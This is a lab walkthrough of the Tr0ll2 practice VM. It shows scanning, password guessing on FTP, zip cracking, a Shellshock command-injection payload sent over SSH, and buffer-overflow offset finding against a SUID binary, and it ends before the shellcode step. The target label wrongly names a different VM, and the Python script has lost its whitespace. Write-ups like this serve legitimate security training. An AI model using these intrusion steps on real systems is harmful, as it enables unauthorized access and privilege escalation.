“The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :) Difficulty is beginner++ to intermediate.” – Maleus
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali Linux (10.10.10.131/24)
Target: TopHatSec: Freshly (10.10.10.141/24)
Vulnerability & Exploit
Found hidden information in picture
Weak passwords used in FTP, login and download suspect encrypted zip file
Cracked the zip file with downloaded dictionary file and found user ‘noob’ and his SSH private key file
Shellshock bug give attacker a way to break in
Buffer Overflow analysis and exploit to get ROOT
Method
Scanned the network to discover the target server [Net Discover]
Port scanned the target to discover the running services and open ports [nmap]
Web application vulnerability scanned to discover any web vulnerability [nikto]
Analysis and write script to check folder list found in ‘robots.txt’
Web information gathering and interacting with the web server [firefox]
Download picture from four different folders and reveal the hidden information stored in one of the pictures
Found the hidden folder and download a base64 encoded file from it, after decoded it, that should be a dictionary file
Try the weak passwords for FTP login and found one works (Tr0ll / Tr0ll)
Downloaded encrypted zip file through FTP and crack it with dictionary file found before [fcrackzip]
Exploit shellshock bug with noob’s private key file to break into the target machine
Look around and found suspicious program with SUID bit set under the path ‘/nothing_to_see_here/choose_wisely/’
Analysis and work out PoC to exploit BoF vulnerability in the target program to get ROOT
Tools
All the tools used here can be found in Kali Linux
Using netdiscover as routine to detect the target’s IP address (10.10.10.141 in this case).
10.10.10.141 is our Target!
Then run NMAP scan to detect opening ports/running services on the target. From the result, TCP port 21, 22 and 80 have been discovered running on Ubuntu Linux.
nmap -sV -v -O -A -T5 -p- 10.10.10.141
Next, I run nikto scan on port 80 to check if there is any web vulnerability.
Nothing too exciting, but noticed that robots.txt found without disallow which is odd. As a result, I open iceweasel browser to have a close look at robots.txt.
Here I wrote a python script to check all of the directories in robots.txt and filter out working directories then saved in a file.
#!/usr/bin/pythonimporthttplibimporturllib2ip='10.10.10.141'img_name='cat_the_troll.jpg'# read URIs found in robots.txtf=open('robots.txt','r')uri_list=f.readlines()f.close()uri_to_check=[]print'[*] Start checking ...'foruriinuri_list:conn=httplib.HTTPConnection(ip)conn.request('GET',(uri.rstrip('\n')+'/'))response=conn.getresponse()ifresponse.status!=404:# filter error code 404 to make the result nice and tidyprint'[+] '+uri.rstrip('\n')+'/'print'[-] '+str(response.status)uri_to_check.append('http://'+ip+uri.rstrip('\n')+'/'+img_name)# if the response code is not 404 then put in uri_to_check list for further analysis# save under inspection URIs to file for further analysisprint'[*] Saving result to file: uris_to_check.txt'f=open('uris_to_check.txt','w')foruriinuri_to_check:f.write(uri+'\n')f.close()print'[*] Done!'
Four directories gave 200 code response. Then I use wget with -i switch to download pictures from each directory.
This file is more like a dictionary file and will be useful later.
FTP & ZIP Crack
Now let’s move to FTP service.
12345678910
root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> bye
221 Goodbye.
I firstly tried anonymous user to login but failed. After checking the MOTD message and used Tr0ll / Tr0ll as login credential, I logged in successfully.
12345678910111213141516171819202122
root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1474 Oct 04 2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.00 secs (5272.7 kB/s)
ftp> bye
221 Goodbye.
Here I found a zip file. After I downloaded it and trying to unzip the lmao.zip, it was asking for password…
Next I try to crack the zip password with the dictionary file found before.
fcrackzip will found the password in seconds! Now I get in the lmao directory and found noob’s SSH key file.
SSH & Shellshock
Firstly, I tried to SSH login with noob’s key file directly but failed. It looks like there is something command run forced.
1234567
root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141
The authenticity of host '10.10.10.141 (10.10.10.141)' can't be established.
ECDSA key fingerprint is 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.141' (ECDSA) to the list of known hosts.
TRY HARDER LOL!
Connection to 10.10.10.141 closed.
By searching in google, I found shellshock bug will help to bypass this and make commands execute. For more details about how to exploit SSH via exploiting shellshock vulnerability, please check: here and here
So I tried the following command and it works!
12345678910
root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141 '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
python -c "import pty; pty.spawn('/bin/bash')"
noob@Tr0ll2:~$ id
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
noob@Tr0ll2:~$ pwd
pwd
/home/noob
Now I have already broken into the shell.
By poking around in the file system, I found three ‘door’ files under /nothing_to_see_here/choose_wisely/. There is r00t file in each door folder and they will change every couple of minutes.
12345678910111213141516171819
noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls -al *
ls -al *
door1:
total 16
drwsr-xr-x 2 root root 4096 Oct 4 2014 .
drwsr-xr-x 5 root root 4096 Oct 4 2014 ..
-rwsr-xr-x 1 root root 7271 Oct 4 2014 r00t
door2:
total 20
drwsr-xr-x 2 root root 4096 Oct 5 2014 .
drwsr-xr-x 5 root root 4096 Oct 4 2014 ..
-rwsr-xr-x 1 root root 8401 Oct 5 2014 r00t
door3:
total 16
drwsr-xr-x 2 root root 4096 Oct 5 2014 .
drwsr-xr-x 5 root root 4096 Oct 4 2014 ..
-rwsr-xr-x 1 root root 7273 Oct 5 2014 r00t
After several trial and error, I found the r00t file with biggest size is the target which is vulnerable to buffer overflow.
123
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./r00t $(python -c 'print "A" * 500')
<_here/choose_wisely/door1$ ./r00t $(python -c 'print "A" * 500')
Segmentation fault
Aha, Segmentation fault looks good so far. Then I upload checksec.sh script to check protections.
123
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./checksec.sh --file r00t
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO No canary found NX disabled No PIE No RPATH No RUNPATH r00t
Great, nearly no protection. Now it’s time to move on to find and overflow the EIP.
Firstly, I use pattern_create.rb to generate 500 unique strings:
Then use gdb on target machine to track the value of EIP when overflow happened.
12345678910111213
noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ gdb -q ./r00t
gdb -q ./r00t
Reading symbols from /nothing_to_see_here/choose_wisely/door1/r00t...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
<7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
Starting program: /nothing_to_see_here/choose_wisely/door1/r00t Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
(gdb) i r esp
i r esp
esp 0xbffffab0 0xbffffab0
(gdb)
0x6a413969 is the pattern, and I use pattern_offset.rb to get the offset is 268. Also, I got the value in ESP is 0xbffffab0
12
root@kali:~/tr0ll2# /usr/share/metasploit-framework/tools/pattern_offset.rb 0x6a413969
[*] Exact match at offset 268
Then I use metasploit to generate a shellcode to run /bin/sh.
